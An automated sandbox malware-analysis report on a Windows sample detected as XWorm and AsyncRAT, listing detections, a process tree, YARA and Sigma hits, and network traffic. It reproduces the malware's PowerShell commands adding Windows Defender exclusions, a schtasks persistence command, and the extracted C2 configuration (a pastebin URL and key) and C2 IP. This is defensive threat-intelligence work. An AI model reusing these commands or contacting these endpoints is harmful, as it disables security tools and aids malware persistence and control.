Edit tour

Windows Analysis Report
jcMcDQ11pZ.exe

Overview

General Information

Sample name:	jcMcDQ11pZ.exe renamed because original name is a hash value
Original sample name:	cc92146cb6e5e514c4bae54ced9f4bf6724b6b8b370f2f6d219aa5b0f95390ba.exe
Analysis ID:	1532622
MD5:	d68dba883125d1a3408e13b84a3524e1
SHA1:	b613717517240829d8c28242a3b2ec7c6576b3f3
SHA256:	cc92146cb6e5e514c4bae54ced9f4bf6724b6b8b370f2f6d219aa5b0f95390ba
Tags:	exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AsyncRAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

jcMcDQ11pZ.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\jcMcDQ11pZ.exe" MD5: D68DBA883125D1A3408E13B84A3524E1)

Stellar Generator.exe (PID: 7336 cmdline: "C:\ProgramData\Stellar Generator.exe" MD5: 6B7FCE17300B729CA1C919AE47DB6C7D)

AdobeIPC.exe (PID: 7364 cmdline: "C:\ProgramData\AdobeIPC.exe" MD5: 1F1441F1CC6080CF821CFDA93BD05E97)

powershell.exe (PID: 7560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7860 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4476 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AdobeIPC" /tr "C:\ProgramData\AdobeIPC" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AdobeIPC (PID: 7632 cmdline: C:\ProgramData\AdobeIPC MD5: 1F1441F1CC6080CF821CFDA93BD05E97)

AdobeIPC.exe (PID: 1436 cmdline: "C:\ProgramData\AdobeIPC.exe" MD5: 1F1441F1CC6080CF821CFDA93BD05E97)

AdobeIPC.exe (PID: 2424 cmdline: "C:\ProgramData\AdobeIPC.exe" MD5: 1F1441F1CC6080CF821CFDA93BD05E97)

AdobeIPC (PID: 7976 cmdline: C:\ProgramData\AdobeIPC MD5: 1F1441F1CC6080CF821CFDA93BD05E97)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": "https://pastebin.com/raw/LsuynkUz", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\AdobeIPC	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\AdobeIPC	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xecb1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe44d:$cnc4: POST / HTTP/1.1
C:\ProgramData\AdobeIPC.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\AdobeIPC.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xecb1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe44d:$cnc4: POST / HTTP/1.1
C:\ProgramData\Guna.UI2.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x41c9f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x522df:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x41d3c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5237c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x41e51:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x52491:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x415ed:$cnc4: POST / HTTP/1.1 0x51c2d:$cnc4: POST / HTTP/1.1
00000002.00000000.1711447769.0000000000AF2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000000.1711447769.0000000000AF2000.00000002.00000001.01000000.00000009.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xe8ff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe99c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xeab1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe24d:$cnc4: POST / HTTP/1.1
Process Memory Space: jcMcDQ11pZ.exe PID: 7284	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: AdobeIPC.exe PID: 7364	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: AdobeIPC.exe PID: 7364	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.jcMcDQ11pZ.exe.2a341a0.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.jcMcDQ11pZ.exe.2a341a0.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xccff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcd9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xceb1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc64d:$cnc4: POST / HTTP/1.1
0.2.jcMcDQ11pZ.exe.2a447e0.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.jcMcDQ11pZ.exe.2a447e0.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xccff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcd9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xceb1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc64d:$cnc4: POST / HTTP/1.1
0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xecb1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe44d:$cnc4: POST / HTTP/1.1
0.2.jcMcDQ11pZ.exe.2a341a0.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.jcMcDQ11pZ.exe.2a341a0.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1f13f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1f1dc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xecb1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1f2f1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe44d:$cnc4: POST / HTTP/1.1 0x1ea8d:$cnc4: POST / HTTP/1.1
2.0.AdobeIPC.exe.af0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.0.AdobeIPC.exe.af0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xecb1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe44d:$cnc4: POST / HTTP/1.1
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\AdobeIPC.exe" , ParentImage: C:\ProgramData\AdobeIPC.exe, ParentProcessId: 7364, ParentProcessName: AdobeIPC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', ProcessId: 7560, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\AdobeIPC.exe" , ParentImage: C:\ProgramData\AdobeIPC.exe, ParentProcessId: 7364, ParentProcessName: AdobeIPC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', ProcessId: 7560, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\AdobeIPC, EventID: 13, EventType: SetValue, Image: C:\ProgramData\AdobeIPC.exe, ProcessId: 7364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeIPC

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\ProgramData\AdobeIPC, CommandLine: C:\ProgramData\AdobeIPC, CommandLine|base64offset|contains: , Image: C:\ProgramData\AdobeIPC, NewProcessName: C:\ProgramData\AdobeIPC, OriginalFileName: C:\ProgramData\AdobeIPC, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\ProgramData\AdobeIPC, ProcessId: 7632, ProcessName: AdobeIPC

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\AdobeIPC.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AdobeIPC.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\AdobeIPC.exe" , ParentImage: C:\ProgramData\AdobeIPC.exe, ParentProcessId: 7364, ParentProcessName: AdobeIPC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe', ProcessId: 7560, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: jcMcDQ11pZ.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\AdobeIPC	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\ProgramData\AdobeIPC.exe	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/LsuynkUz", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\AdobeIPC	ReversingLabs: Detection: 87%
Source: C:\ProgramData\AdobeIPC	Virustotal: Detection: 65%	Perma Link
Source: C:\ProgramData\AdobeIPC.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\AdobeIPC.exe	Virustotal: Detection: 65%	Perma Link
Source: C:\ProgramData\Stellar Generator.exe	ReversingLabs: Detection: 54%
Source: C:\ProgramData\Stellar Generator.exe	Virustotal: Detection: 34%	Perma Link

Multi AV Scanner detection for submitted file

Source: jcMcDQ11pZ.exe	ReversingLabs: Detection: 71%
Source: jcMcDQ11pZ.exe	Virustotal: Detection: 75%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\AdobeIPC	Joe Sandbox ML: detected
Source: C:\ProgramData\AdobeIPC.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: jcMcDQ11pZ.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	String decryptor: https://pastebin.com/raw/LsuynkUz
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	String decryptor: Stellar
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	String decryptor: USB.exe
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	String decryptor: %ProgramData%
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack	String decryptor: AdobeIPC

Source: jcMcDQ11pZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49768 version: TLS 1.2

Source: jcMcDQ11pZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: $C:\ProgramData\Stellar Generator.pdb source: jcMcDQ11pZ.exe, 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\tools\programmes\Rain Generator\Rain Generator\obj\Release\Rain Generator.pdb source: Stellar Generator.exe, 00000001.00000000.1709947841.000000000095D000.00000002.00000001.01000000.00000006.sdmp, Stellar Generator.exe.0.dr
Source:	Binary string: D:\tools\programmes\Rain Generator\Rain Generator\obj\Release\Rain Generator.pdbE source: Stellar Generator.exe, 00000001.00000000.1709947841.000000000095D000.00000002.00000001.01000000.00000006.sdmp, Stellar Generator.exe.0.dr
Source:	Binary string: !*Stellar Generator.pdb source: jcMcDQ11pZ.exe
Source:	Binary string: %Stellar Generator.pdb-=>False-=>False source: jcMcDQ11pZ.exe, 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Stellar Generator.pdb source: jcMcDQ11pZ.exe, 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: KStellar Generator.pdb-=>False-=>False source: jcMcDQ11pZ.exe

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/LsuynkUz

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Yara detected Generic Downloader

Source: Yara match

File source: C:\ProgramData\Guna.UI2.dll, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49774 -> 193.161.193.99:46070

Source: global traffic

HTTP traffic detected: GET /raw/LsuynkUz HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.161.193.99 193.161.193.99
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99
Source: unknown	TCP traffic detected without corresponding DNS query: 193.161.193.99

Source: global traffic

HTTP traffic detected: GET /raw/LsuynkUz HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: pastebin.com

Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
